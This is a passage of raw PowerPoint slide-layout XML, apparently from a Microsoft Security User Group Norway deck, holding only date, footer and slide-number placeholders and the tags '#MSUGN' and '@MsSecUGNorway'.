          </a:prstGeom>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9432778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287780" y="6412447"/>
            <a:ext cx="4114800" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53A8E6D7-BFE5-4AFE-A54F-B6EC40DE1127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591"/>
            <a:ext cx="612668" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B78C27-7F29-42FF-8C70-77F242BD9332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="1096775" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12594585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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="2286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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29368628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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="22860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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2961972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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32814411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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22312959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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="22860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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35300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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350629780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287780" y="6412447"/>
            <a:ext cx="4114800" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53A8E6D7-BFE5-4AFE-A54F-B6EC40DE1127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591"/>
            <a:ext cx="612668" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B78C27-7F29-42FF-8C70-77F242BD9332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="1096775" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34473153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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="2286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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2797296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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="2286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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31599997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3E7FF3-8ADF-4096-A73C-46D62188FA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04025" y="432332"/>
            <a:ext cx="5983950" cy="5993336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38747537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71CE9-E242-4896-9FEB-BE7F847FE2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D97DEA-7AF4-4B70-A5E5-8FA3A61652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C03F5E-B020-452C-BB56-81BD6005560A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156981" y="6492875"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D0E4BA55-9EBB-4D8A-927E-06E14CE18DE1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E225D6AB-CAE0-43DF-8ED1-6A4A49229D8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60AABEA-5F26-4EF4-96EF-4BC547429FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39512858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80558-174B-41AF-B1EA-2441DFBA27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52C7D1-935B-4E37-B381-2E871729F3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0F1B83-C232-4006-A99E-3968AF259C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ADDC5271-D635-40A1-89AA-F1F2949253CF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB6E048-3007-4BD7-B5E8-BC7183634B9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4E85060-5BEA-49EF-8292-6F986C9913A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16663761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E518-2648-43D7-A7DD-2DDEA84588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9E3C6EB-09A7-4D1D-BB40-DB2225D6FF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0692A1-D5C1-4A75-83FB-41B490CF6BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{855C41AA-A707-4B7A-A0C6-1CBF05C48AD5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA49903D-B302-4004-A615-C56E82F9669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A049D99-67B1-466A-AB52-EB8DC9C9EBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39966684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676C1-FB66-42E2-B990-FD8B6CED29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016973-C74F-4B71-8E22-6EF2C4E039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417A6F-4C10-4A2C-8649-AF39384618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D476AE-E19C-4ACE-991D-BE4CE057912B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{83B63A9F-AFF2-49ED-93D3-0D279E0ADA05}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962D6D75-98F5-44AA-92DF-9EEC3387B40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200682A-03BF-45AD-AE3E-22D5695504DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40667983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62D71-8C68-48F6-BDDE-ADB8950821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CB24E8-C03D-417E-AC47-BD635CBEB0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B0E2B0-B8D0-4A71-A477-499955CBB7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594943-B339-4310-83B5-CCF7171BFF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A3041E-222B-45DB-B3FF-B8BD085E7D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7A92BEF-2BAD-4A40-9E03-21D86FFCC148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D6CA99DD-F39B-4B88-9832-EC3F6233D61E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A659002C-E625-4E50-BF38-97792CC2EF8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CD424807-5482-4AA7-85B7-B7B9CEFE23A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
